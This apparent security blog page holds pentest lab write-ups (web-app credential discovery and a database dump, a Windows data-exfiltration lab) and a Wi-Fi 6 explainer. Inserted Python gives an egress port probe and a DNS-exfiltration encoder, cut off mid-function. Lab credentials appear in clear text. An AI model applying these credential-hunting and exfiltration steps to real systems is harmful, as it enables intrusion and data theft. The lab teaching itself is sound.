
ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes exist in every major security system; you just need to understand them well.

  • Kumar Atul Jaiswal

    Web Developer

    Technology is the best way to change everything, like mindset and goals.


PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • Penetration Testing on Internal Web Application


    Scenario


    You are a penetration tester hired by the company AwdMgmt to perform security tests on their internal web application and machines. You are asked to perform the penetration test on the client premises. During this engagement you are not given a well-defined scope: you are sitting in the client's corporate building, directly attached to the client network.




    Objective


    The objective of this lab is first to find the web servers in the network you are directly attached to, and then to test the web application running on them in order to check whether you can access restricted areas (that is, the pages behind the login).



    Tools


    The tools best suited to this lab are:

    # DirBuster
    # mysql
    # Web browser



    Steps -


    1) Find all the machines in the network

    2) Identify the machines role

    3) Explore the web application

    4) Find hidden files

    5) Test the credentials found

    6) Retrieve the correct admin password


    Solution steps


    Find all the machines in the network

    We first need to find the address of the corporate network we are connected to. We can do so by running ifconfig and checking the IP address of our tap0 interface (the interface the lab VPN created).



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ ifconfig           
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 12329  bytes 1183972 (1.1 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 12329  bytes 1183972 (1.1 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 10.104.11.50  netmask 255.255.255.0  broadcast 0.0.0.0
            inet6 fe80::8cfa:99ff:fe9b:3351  prefixlen 64  scopeid 0x20<link>
            ether 8e:fa:99:9b:33:51  txqueuelen 1000  (Ethernet)
            RX packets 4679  bytes 256538 (250.5 KiB)
            RX errors 0  dropped 2  overruns 0  frame 0
            TX packets 5763  bytes 321536 (314.0 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.6.25  netmask 255.255.255.0  broadcast 192.168.6.255
            inet6 2409:4064:e0b:64bf:9407:d0bc:70d9:cc95  prefixlen 64  scopeid 0x0<global>
            inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 95039  bytes 105443523 (100.5 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 56428  bytes 9346057 (8.9 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    


    As we can see, the target network is 10.104.11.0/24. Let's run nmap with the -sn option (host discovery only, no port scan) in order to discover all the available hosts on the network.





    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -sn 10.104.11.0/24 
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:28 IST
    Nmap scan report for 10.104.11.96
    Host is up (0.61s latency).
    MAC Address: 00:50:56:A5:F5:80 (VMware)
    Nmap scan report for 10.104.11.198
    Host is up (0.64s latency).
    MAC Address: 00:50:56:A5:F5:80 (VMware)
    Nmap scan report for 10.104.11.50
    Host is up.
    Nmap done: 256 IP addresses (3 hosts up) scanned in 14.65 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    



    The previous command reports three hosts up, but one of them (10.104.11.50) is our own tap0 address, so there are only two other hosts alive in the network: 10.104.11.96 and 10.104.11.198.

     


    Identify the machines role


    Let us run nmap in order to gather information about the services listening on our targets. For this we will run a -sV scan as follows:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -sV 10.104.11.96,198
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:29 IST
    Nmap scan report for 10.104.11.96
    Host is up (0.85s latency).                                                         
    Not shown: 998 closed tcp ports (reset)                                        
    PORT   STATE SERVICE VERSION                                       
    22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
    80/tcp open  http    Apache httpd 2.2.22 ((Debian))
    MAC Address: 00:50:56:A5:03:17 (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap scan report for 10.104.11.198
    Host is up (0.91s latency).
    Not shown: 998 closed tcp ports (reset)
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
    3306/tcp open  mysql   MySQL 5.5.38-0+wheezy1
    MAC Address: 00:50:56:A5:F5:80 (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 2 IP addresses (2 hosts up) scanned in 143.46 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]                                                                
    └─$ 
    
    



    From the results, we can see that the machine with IP address 10.104.11.96 is running Apache on port 80, meaning that it is probably hosting the internal web application, while the other machine (10.104.11.198) is running MySQL. Keep in mind that nmap by default only probes the 1,000 most common TCP ports; in a real engagement a full -p- scan would be the next step.

    Since the scope of the engagement is to check whether an attacker can access restricted areas of the web application, let's focus our tests on the machine 10.104.11.96.




    Explore the web application


    In order to inspect the web application we just need to type the IP address of the target machine into our browser.





    If we inspect the web application, we can see that the "Sign up" page is not available, meaning that we cannot create a new user in order to access the restricted area.

    Moreover, we do not have any valid credentials to use, and the login form does not appear to be vulnerable to SQL injection.


    Find hidden files


    Since we do not want to brute-force the login form, we can try running a discovery tool such as DirBuster in order to find hidden files that may help us with our goal.






    Let us start DirBuster and run a scan using the directory-list-2.3-small.txt wordlist. After a minute or two, we should start getting some interesting results:










    Here we can see that in the include folder there is a file named config.old. A .old copy of a PHP file is served by Apache as plain text rather than executed, so let us inspect it and see if there is anything interesting in it:







    As we can see, the file contains some database credentials! If you recall, in the previous steps we found a machine running MySQL. Let us try a DB connection to that machine with the credentials just found. (Passing the password inline with -p puts it into your shell history and the process list; in a real engagement, omit the value and let mysql prompt for it.)


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ mysql -u awd -pUcuijsQgGOFILdjdL8D -h 10.104.11.198
    ERROR 1045 (28000): Access denied for user 'awd'@10.104.11.10' (using password: YES)
                                                                                                                                          
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$                                                                                                                             
    
    
    


    Unfortunately, it seems that these credentials are no longer valid. Let us keep investigating the files found with DirBuster. If we check the previous screenshot, we can see that there is a page named signup.php that we were not able to reach from the links in the web application:





    This is even better than the previous file: the page exposes a second, current set of database credentials.


    Test the credentials found


    Let us try the credentials found in the signup.php file and see if we are able to access the DB!

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ mysql -u awdmgmt -pUChxKQk96dVtM07 -h 10.104.11.198
    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MySQL connection id is 241
    Server version: 5.5.38-0+wheezy1 (Debian)
    
    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
    
    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    
    MySQL [(none)]>
    
    

     

     



    As we can see, this time we are successfully logged into the database! Let us inspect it!



    Retrieve the correct admin password


    Let us use some simple MySQL commands to navigate the database and check whether there is anything interesting in it. First we have to select the database to use (awdmgmt_accounts, named after the application), then inspect its tables and data, as follows:


    MySQL [(none)]> use awdmgmt_accounts;
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A
    
    Database changed
    MySQL [awdmgmt_accounts]> show tables;
    +----------------------------+
    | Tables_in_awdmgmt_accounts |
    +----------------------------+
    | accounts                   |
    +----------------------------+
    1 row in set (0.528 sec)
    
    MySQL [awdmgmt_accounts]> select * from accounts;
    +----+--------------------+----------+-------------+
    | id | email              | password | displayname |
    +----+--------------------+----------+-------------+
    |  1 | admin@awdmgmt.labs | ENS7VvW8 | Admin       |
    +----+--------------------+----------+-------------+
    1 row in set (0.898 sec)
    
    MySQL [awdmgmt_accounts]> 
    
    
    


    Note that the accounts table stores the admin password in clear text, so anyone with read access to the database has a working login without any cracking. With the information just obtained, let us try to log into the web application:



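The accounts table dumped above keeps the admin password in clear text, so the database leak was immediately a working login. As an added example (not the lab application's code), the block below shows the storage scheme the application should have used: a per-account random salt, scrypt as a deliberately slow hash, a constant-time comparison, and the same hashing cost for unknown users so that login timing does not reveal which e-mail addresses exist. The row shape follows the dumped table; the scheme, the work factors and the sample values are assumptions.

```python
"""Added example (not the lab application's code): how the accounts table
should have stored the admin password instead of the clear-text value dumped
above. Each password is hashed with scrypt under a per-account random salt and
checked with a constant-time compare, so a copy of the table no longer yields
a working login. Row shape mirrors the dumped table; the hashing scheme, work
factors and sample values are assumptions."""
import base64
import hashlib
import hmac
import os

# scrypt cost parameters: N=2**14, r=8 needs about 16 MiB per hash (assumption).
SCRYPT_N, SCRYPT_R, SCRYPT_P, DKLEN = 2 ** 14, 8, 1, 32


def _scrypt(password, salt):
    return hashlib.scrypt(password.encode("utf-8"), salt=salt,
                          n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)


def hash_password(password, salt=None):
    """Return 'scrypt$<salt b64>$<hash b64>'; a fresh 16-byte salt per account."""
    salt = salt if salt is not None else os.urandom(16)
    digest = _scrypt(password, salt)
    return "$".join(["scrypt",
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(digest).decode("ascii")])


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 3 or parts[0] != "scrypt":
        return False
    salt, expected = base64.b64decode(parts[1]), base64.b64decode(parts[2])
    return hmac.compare_digest(_scrypt(password, salt), expected)


# Computed once; used for unknown e-mail addresses so a failed login costs the
# same whether or not the account exists (no user enumeration through timing).
_DUMMY_STORED = hash_password("not-a-real-password", salt=b"\x00" * 16)


def login_plaintext(rows, email, password):
    """The pattern the dumped table implies: the password column IS the secret."""
    row = rows.get(email)
    return row is not None and row["password"] == password


def login_hashed(rows, email, password):
    """The hardened form: the column holds only salt and scrypt output."""
    row = rows.get(email)
    stored = row["password"] if row is not None else _DUMMY_STORED
    return verify_password(password, stored) and row is not None


def build_tables(admin_password="ENS7VvW8"):
    """Constructed rows in the shape of the dumped accounts table; the default
    value is the clear-text password the dump showed."""
    plaintext_rows = {"admin@awdmgmt.labs": {"displayname": "Admin",
                                             "password": admin_password}}
    hashed_rows = {"admin@awdmgmt.labs": {"displayname": "Admin",
                                          "password": hash_password(admin_password)}}
    return plaintext_rows, hashed_rows


if __name__ == "__main__":
    plain, hashed = build_tables()
    print("clear-text row:", plain["admin@awdmgmt.labs"]["password"])
    print("hashed row    :", hashed["admin@awdmgmt.labs"]["password"])
    print("login ok      :", login_hashed(hashed, "admin@awdmgmt.labs", "ENS7VvW8"))
```

With this scheme the dump we obtained would have contained only salts and scrypt outputs, and the attacker would be back to guessing passwords at a few hashes per second instead of logging straight in.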


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  • The biggest contribution of wifi 6 to technology

     


     

     

    Wi-Fi 6

    Hello guys. In this blog we are going to talk about the 802.11ax wireless standard, more commonly known as Wi-Fi 6. Wi-Fi 6 was released in 2019 and, at the time of writing, is the latest wireless standard used in wireless devices; it is the successor to the 802.11ac standard, known as Wi-Fi 5.

    Wi-Fi 6 is faster than Wi-Fi 5, but speed was not its main goal. The main goal of Wi-Fi 6 was to make a Wi-Fi network perform better when a lot of devices are connected to it, because today there are so many devices in our homes that use Wi-Fi: computers, tablets, phones, security cameras, refrigerators, light switches, thermostats and more. With so many devices competing for the Wi-Fi signal, a network slows down, because a Wi-Fi router can only communicate with so many devices at a time.






    So to meet this demand engineers developed Wi-Fi 6. What are the differences between Wi-Fi 6 and Wi-Fi 5? One of them is obviously speed. The older Wi-Fi 5 had a maximum speed of 3.5 gigabits per second; with Wi-Fi 6 that has been increased to 9.6 gigabits per second, which is a significant increase. Keep in mind that this is an aggregate figure shared across multiple devices; it does not mean that each of your devices will achieve this speed. It is also a local area network speed, meaning in your home or office, so it does not mean that your internet speed will increase. It will, however, make the network feel faster because of the technologies that have been implemented in Wi-Fi 6. One of these technologies is orthogonal frequency-division multiple access, or OFDMA.

     

    This technology lowers latency and delivers data to multiple devices more efficiently. For example, let's say that Wi-Fi transmissions act like carts that deliver data to Wi-Fi devices, and that you have three Wi-Fi devices. With the older Wi-Fi 5, a cart would deliver one piece of data to one device at a time, so each device would have to wait its turn to receive data. With the newer Wi-Fi 6, each cart carries three pieces of data and delivers to all three devices at the same time, so none of them has to wait. This makes data delivery more efficient, which reduces lag.

    Another technology that Wi-Fi 6 uses is MU-MIMO, which stands for multi-user, multiple-input, multiple-output. This technology first made its debut in Wi-Fi 5 Wave 2. It allows multiple wireless devices to communicate with a Wi-Fi router at the same time. Before that, routers used SU-MIMO, single-user MIMO, which also let a router serve multiple devices, but only one device at a time, so each device had to wait its turn. With a MU-MIMO router the connected devices do not have to wait their turn, because the router can communicate with several of them simultaneously.

     




    It breaks the available bandwidth up into individual streams and pushes them to the connected devices, so you will see a significant improvement when several devices are doing bandwidth-heavy things at once, such as streaming video or downloading. As stated before, MU-MIMO debuted in Wi-Fi 5 Wave 2, but it has been improved in Wi-Fi 6. The difference is that in Wi-Fi 5 it was only available for downlink and could only serve four simultaneous streams, whereas in Wi-Fi 6 it is available for both uplink and downlink and can serve up to eight simultaneous streams. Wi-Fi 6 also improves beamforming. Beamforming is a technique that sends transmissions in a specific direction, which strengthens the signal; without beamforming, as in older routers, the transmission is sent in every direction, which weakens it. Newer routers direct the signal towards the devices connected to them.

     

    Wi-Fi 6 also has the ability to minimize interference from nearby networks, using a technology called BSS (basic service set) coloring. For example, when two Wi-Fi routers sit next to each other, as happens with neighbours, the signals from the two networks can overlap and interfere with each other. With BSS coloring, Wi-Fi 6 colors, or marks, each network's frames so that a router can distinguish another network from its own and disregard frames from nearby networks. This makes the router more efficient, because the less time it spends on traffic that is not its own, the more responsive it can be. As far as security goes, Wi-Fi 6 comes with the latest security protocol, WPA3. WPA3-Personal replaces the WPA2 pre-shared-key handshake with SAE (Simultaneous Authentication of Equals), so a captured handshake can no longer be used for offline password guessing; each guess requires a live exchange with the access point, which increases protection against password-guessing attempts.

     

     


     

     

    In order for a device to be Wi-Fi CERTIFIED 6 it must support WPA3. Wi-Fi 6 also has the ability to extend the battery life of Wi-Fi devices, using a technology called Target Wake Time. With Target Wake Time, a router or access point schedules with each Wi-Fi device when data is to be sent or received. At the scheduled time the device's radio is powered on to send or receive; the rest of the time the device goes into sleep mode with its radio powered off, which saves battery. Wi-Fi routers broadcast on a frequency band that wireless devices connect to, and up until now they have been restricted to two bands, 2.4 and 5 gigahertz. With the new Wi-Fi 6E a third band is added, 6 gigahertz. The 6 gigahertz band opens up additional channels for delivering large amounts of data to Wi-Fi devices, especially in crowded environments, which results in better network performance and a greater capacity to support more users.

     





    Who would benefit from a Wi-Fi 6 router?

    If you have a lot of wireless devices, perhaps 15 or more, then I would definitely recommend getting one, especially if you have closer to 20 devices, because you will see a big difference in the performance of your network. Keep in mind, though, that in order to reap the full benefits of Wi-Fi 6 your devices must themselves support Wi-Fi 6.

     


     





  • File Transfer From Windows to Linux via rdesktop

     

    File Transfer From Windows to Linux via rdesktop


     



    rdesktop is a command-line Remote Desktop (RDP) client that lets you manage a Windows box from a Linux machine.

    Sometimes it is important to be able to move files between the two, especially when there is no FTP or SMB service available. Fortunately, rdesktop supports this by redirecting a local directory into the session as a share.

    When connecting to Windows, we use the following notation in the rdesktop arguments:

     


      
    $ rdesktop  172.16.91.100 -r disk:linux=/home/hackerboy/Documents/ine-lab
    
    



     -f : not important in our case; it just selects full-screen mode. To enter and exit full-screen mode, press Ctrl+Alt+Enter.
     

     -r : the device redirection option. disk is one of the available redirections: it creates a network drive on the Windows box named "linux" that points to /home/hackerboy/Documents/ine-lab on our Linux box. Don't forget that this feature needs Windows XP or newer, and that the share name is limited to 8 characters!


    After connecting with these options, open My Computer on the Windows box (inside the rdesktop window); see below.






    Here you'll find a device named "linux on Kumar Atul Jaiswal" (your Linux hostname): this is your /home/hackerboy/Documents/ine-lab folder! Anything the Windows side writes there lands directly on your Linux box, so redirect a dedicated directory rather than your home folder.

    The -r option of rdesktop supports many other redirections, such as sound, printer and clipboard. Check the manual page for details.







      - Hacking Truth by Kumar Atul Jaiswal

  • Try to exfiltrate an interesting file Practical

     


     

     

    Scenario


    A client gives you remote desktop access to a machine and wants you to identify all the possible ways an attacker could exfiltrate data (that is, if he were able to compromise this machine) without changing any firewall setting.

    If you are unfamiliar with the term: exfiltration is the unauthorised transfer of data out of a target machine or network to a system the attacker controls.



    Learning objectives


    In this lab, you will learn how to:
     

    1) Assess firewall settings

    2) Leverage insufficiently secure firewall settings 

    3) Encrypt interesting data and exfiltrate it using DNS 

    4) Automatically identify all possible exfiltration ways



    Recommended tools

    1) Kali Linux

    2) Packet Whisper (https://github.com/TryCatchHCF/PacketWhisper)

    3) Wireshark

    4) rdesktop (command line utility)

    5) Egress framework (https://labs.mwrinfosecurity.com/blog/egress-checking)
     

     



    Network configuration & credentials


    Intranet subnet: 172.16.91.0/24
    Under-investigation machine's IP: 172.16.91.100
    Connection type: RDP


    First, download the lab's OpenVPN configuration file and connect with it:


     


     

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Documents/ine-lab]
    └─$ sudo openvpn data-exfiltration.ovpn
    2021-12-10 12:23:07 DEPRECATED OPTION: --cipher set to 'AES-128-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-128-CBC' to --data-ciphers or change --cipher 'AES-128-CBC' to --data-ciphers-fallback 'AES-128-CBC' to silence this warning.
    2021-12-10 12:23:07 OpenVPN 2.5.1 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on May 14 2021
    2021-12-10 12:23:07 library versions: OpenSSL 1.1.1l  24 Aug 2021, LZO 2.10
    🔐 Enter Auth Username: ZzxVBe7hGAGyKa
    🔐 Enter Auth Password: **************          
    2021-12-10 12:23:18 TCP/UDP: Preserving recently used remote address: [AF_INET]69.46.7.227:42817
    2021-12-10 12:23:18 Attempting to establish TCP connection with [AF_INET]69.46.7.227:42817 [nonblock]
    2021-12-10 12:23:18 TCP connection established with [AF_INET]69.46.7.227:42817
    2021-12-10 12:23:18 TCP_CLIENT link local: (not bound)
    2021-12-10 12:23:18 TCP_CLIENT link remote: [AF_INET]69.46.7.227:42817
    2021-12-10 12:23:21 [Hera Openvpn Cluster] Peer Connection Initiated with [AF_INET]69.46.7.227:42817
    2021-12-10 12:23:23 TUN/TAP device tap0 opened
    2021-12-10 12:23:23 net_iface_mtu_set: mtu 1500 for tap0
    2021-12-10 12:23:23 net_iface_up: set tap0 up
    2021-12-10 12:23:23 net_addr_v4_add: 172.16.91.10/24 dev tap0
    2021-12-10 12:23:23 Initialization Sequence Completed
    
    
    

     


    Username: aZsQDu1tFLwoTI
    Password: F88ggxcZ3MNzoj

     

     
    Use a Kali Linux (or another penetration testing distribution) virtual machine to connect to the 172.16.91.100 machine, by opening a terminal and executing the below:


    # rdesktop  172.16.91.100 -r disk:linux=/home/hackerboy/Documents/ine-lab

    The -r disk:linux=/home/hackerboy/Documents/ine-lab part redirects our local directory into the RDP session as a share named "linux"; we will see why that is useful later on.

     

     



     



    Credentials


    Username: AdminELS
    Password: Nu3pmkfyX
     


    Tasks


    Task 1: Connect to and scrutinize the 172.16.91.100 machine.
    Task 2: Identify if the 172.16.91.100 machine allows any of the commonly used ports outbound connectivity.
    Task 3: Try to exfiltrate an interesting file.
    Task 4: Automate enumerating all the exfiltration paths and identify another one.


     

     

    Solutions


    Below, you can find solutions for each task.

    Task 1: Connect to and scrutinize the 172.16.91.100 machine

    Once you are connected to the 172.16.91.100 machine, launch "cmd.exe". First, search for interesting files such as passwords.txt, credentials.txt or secrets.txt by executing the following:

     

    cd /
    
    dir /s /b passwords.txt
    
    dir /s /b credentials.txt
    

    You will see that a credentials.txt file exists inside the C:\Documents\Sensitive directory. This file contains a username and password.
     

     

     


     

     

    While you are still inside the Windows terminal (cmd.exe), also check whether any scripting languages (or compilers) are installed:

     

    python --version
    
    g++ --version
    
    powershell ls
      

    The successful execution of the above commands indicates that Python and PowerShell are installed on (or at least allowed to run on) the 172.16.91.100 machine; the g++ check does the same for a native compiler.

    These scripting languages contain useful capabilities that can be leveraged by penetration testers during all phases of a penetration test.

     



    Task 2: Identify if the 172.16.91.100 machine allows any of the commonly used ports outbound connectivity

    To identify if the 172.16.91.100 machine allows any of the commonly used ports outbound connectivity, follow the procedures below.




    For ports 80 (TCP), 443 (TCP), 8080 (TCP) and 8443 (TCP) the procedure is as follows:

    Launch a Python web server on the port of choice on your Kali machine.

    To start it, open a new terminal, go to a directory in Kali that holds the files you want to share (for example /tmp), and then type:

     

    # cd /tmp                          <- To navigate to the /tmp directory.
    
    # python -m SimpleHTTPServer 8080  <- Python 2 module; on a Python 3-only Kali the equivalent module is http.server.
    
    
    
    

     


    The /tmp folder is a place where you can put files for a temporary time. The Linux OS itself uses this folder for placing temporary files.

     

    As you can imagine, we will be testing whether port 8080 (TCP) is allowed outbound connectivity by the 172.16.91.100 machine's firewall: if it is, the request from the Windows machine shows up in the Python server's terminal.

    You should see something similar to the below screenshot: 


    Identify the tap0 IP address of your Kali machine

    To see the tap0 IP of your Kali machine, open a new terminal and run ifconfig as in the earlier labs; the address is the one OpenVPN assigned to tap0 (172.16.91.10 in our case).

     





    1) Run Wireshark on your Kali machine.


    In order to capture traffic from the lab's network, click on Capture and select Options, then you will click the "tap0" interface and finally press Start (as indicated in the screenshot below).





     



    Configure the DNS server on the 172.16.91.100 machine to point to your Kali machine's tap0 IP (the same as previously used).

    In order to change the DNS settings of the 172.16.91.100 machine, double click the Ethernet0 shortcut that is present on the AdminELS user's Desktop and then:


    1) Select Properties
    2) Choose Internet Protocol Version 4



     

     

     

    From the Internet Protocol Version 4 (TCP/IPv4) Properties window:

    1) Choose Properties
    2) Insert your Kali's tap0 IP address as preferred DNS and click OK.

     





     

     

    Launch a browser on the Windows machine and navigate to http://172.16.91.10:8080, that is, your Kali tap0 IP and the port the Python server is listening on.


    Now go to your Kali machine, where Wireshark is running, and observe the traffic issued by the 172.16.91.100 machine: the connection to port 8080 and, since its DNS server now points at Kali, its DNS queries. You should see something similar to the screenshot below.

     

     

     


     

     

     

    To check ports 443 (TCP) and 8443 (TCP), repeat the same procedure: restart the Python server on the port under test, keep Wireshark capturing on tap0, and browse from Windows to the tap0 Kali IP together with that port. You will find that these ports are not allowed outbound connectivity.

    For port 53 (UDP), the procedure is as follows.

    Note: in a real environment you could simply launch Wireshark and see whether you can "sniff" any DNS requests originating from the 172.16.91.100 machine; if so, port 53 (UDP) is allowed outbound. Here we forced that by pointing the machine's DNS server at our Kali tap0 address, so its lookups arrive on tap0. Keep in mind that this only shows UDP/53 to a host on the same subnet; for real-world exfiltration what matters is whether DNS can reach an external resolver, or at least whether the internal resolver forwards queries outside.

    Find below an example of such DNS requests (which are irrelevant to this lab, hence the unrelated IPs).

    Such captured traffic means that the firewall allows DNS traffic outbound (port 53 UDP).

    To summarize our activities thus far, we have identified that ports 8080 (TCP) and 53 (UDP) are allowed outbound connectivity.
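The port checks above are done by hand, one browser request per port. As an added example (not from the lab and not the Egress framework), the following Python block does the same thing programmatically from the machine under test, where Python is available, and distinguishes the answers a firewall can give: a completed connection, a refusal (the SYN got out and a RST came back), a timeout (the usual signature of a firewall that silently drops), or a routing error. A local listener stands in for the Python server on Kali so the demo runs offline; the host, the ports and the timeout are assumptions.

```python
"""Added example (not from the lab or the Egress framework): a TCP egress
probe run from the victim's side. 'open' means the listener answered,
'refused' means a RST came back (the firewall let the SYN through, nothing
listened there), 'filtered' means no answer before the timeout (a dropping
firewall), 'unreachable' means a routing error. A loopback listener plays the
Kali-side Python server; host, ports and timeout are assumptions."""
import socket
import threading

COMMON_PORTS = [80, 443, 8080, 8443]


def probe_port(host, port, timeout=3.0):
    """Classify one outbound TCP port from the victim's point of view."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "refused"
    except socket.timeout:
        return "filtered"
    except OSError:
        return "unreachable"
    finally:
        sock.close()


def egress_report(host, ports=COMMON_PORTS, timeout=3.0):
    """{port: state} for every port, e.g. {8080: 'open', 443: 'filtered'}."""
    return {port: probe_port(host, port, timeout) for port in ports}


def usable_ports(report):
    """Ports an attacker could exfiltrate over: the firewall passed the SYN.
    A refusal counts too, unless the firewall itself rejects with RST; confirm
    with a capture on the listener side, as the lab does with Wireshark."""
    return sorted(p for p, state in report.items() if state in ("open", "refused"))


def start_listener(host="127.0.0.1"):
    """Stand-in for the lab's Python server: accept-and-close on an ephemeral port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:  # listener was shut down
                break

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def stop_listener(srv):
    try:
        srv.shutdown(socket.SHUT_RDWR)  # wakes the blocked accept() on Linux
    except OSError:
        pass
    srv.close()


def free_port(host="127.0.0.1"):
    """An ephemeral port with nothing listening, to exercise the 'refused' case."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind((host, 0))
    port = sock.getsockname()[1]
    sock.close()
    return port


def demo():
    """Probe one listening and one closed loopback port; return the report."""
    srv, open_port = start_listener()
    closed_port = free_port()
    try:
        return egress_report("127.0.0.1", [open_port, closed_port], timeout=1.0)
    finally:
        stop_listener(srv)


if __name__ == "__main__":
    result = demo()
    for port, state in result.items():
        print(f"{port}/tcp {state}")
    print("usable for egress:", usable_ports(result))
```

Against the lab machine you would point egress_report at the Kali tap0 address with the Python server bound to the port under test; a 'filtered' result for 443 and 8443 and 'open' for 8080 is the programmatic equivalent of the browser checks above.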

     

     

     

    Task 3: Try to exfiltrate an interesting file


    Based on the ports identified as allowed outbound, the stealthier exfiltration path is port 53 (UDP): DNS queries are rarely blocked and rarely inspected. PacketWhisper can help you exfiltrate data through DNS requests.

    PacketWhisper is a Python-based tool, and luckily we identified that Python is installed on the 172.16.91.100 machine.
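Before running the tool, it helps to see what DNS exfiltration actually puts on the wire. The following is an added example (not PacketWhisper's code): it encodes a file into DNS query names on the sending side and reassembles it from the names seen on the receiving side, the way Wireshark on tap0 (or the authoritative server for an attacker-controlled domain, when the victim uses its normal resolver) would see them. The 'observed' capture is constructed; the domain, the tag label and the chunk size are assumptions.

```python
"""Added example (not PacketWhisper's code): the transport step of DNS
exfiltration. The sender turns a file into query names of the form
<seq>-<total>-<base32 chunk>.<tag>.<domain>; the receiver reassembles the file
from whichever of those names it observed. The capture below is constructed;
domain, tag and chunk size are assumptions."""
import base64
import zlib

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # and a full name at most 253 characters in text form


def _b32(data):
    # base32 is DNS-safe (letters and digits only) and survives resolvers that
    # randomise label case (so-called 0x20 encoding); padding is dropped.
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def _unb32(text):
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_file(data, domain, tag="x", chunk_bytes=30):
    """Compress `data` and split it into query names, in order."""
    payload = zlib.compress(data)
    total = max(1, -(-len(payload) // chunk_bytes))  # ceiling division
    names = []
    for seq in range(total):
        chunk = payload[seq * chunk_bytes:(seq + 1) * chunk_bytes]
        label = f"{seq}-{total}-{_b32(chunk)}"
        name = f"{label}.{tag}.{domain}"
        if len(label) > MAX_LABEL or len(name) > MAX_NAME:
            raise ValueError("chunk_bytes too large for one DNS label")
        names.append(name)
    return names


def decode_queries(observed_names, domain, tag="x"):
    """Reassemble the file from whatever query names were captured.
    Tolerates duplicates (client retries), out-of-order arrival and unrelated
    queries; raises if any chunk never arrived."""
    suffix = f".{tag}.{domain}".lower()
    chunks, total = {}, None
    for name in observed_names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue  # the machine's normal lookups, not ours
        parts = name[:-len(suffix)].split("-", 2)
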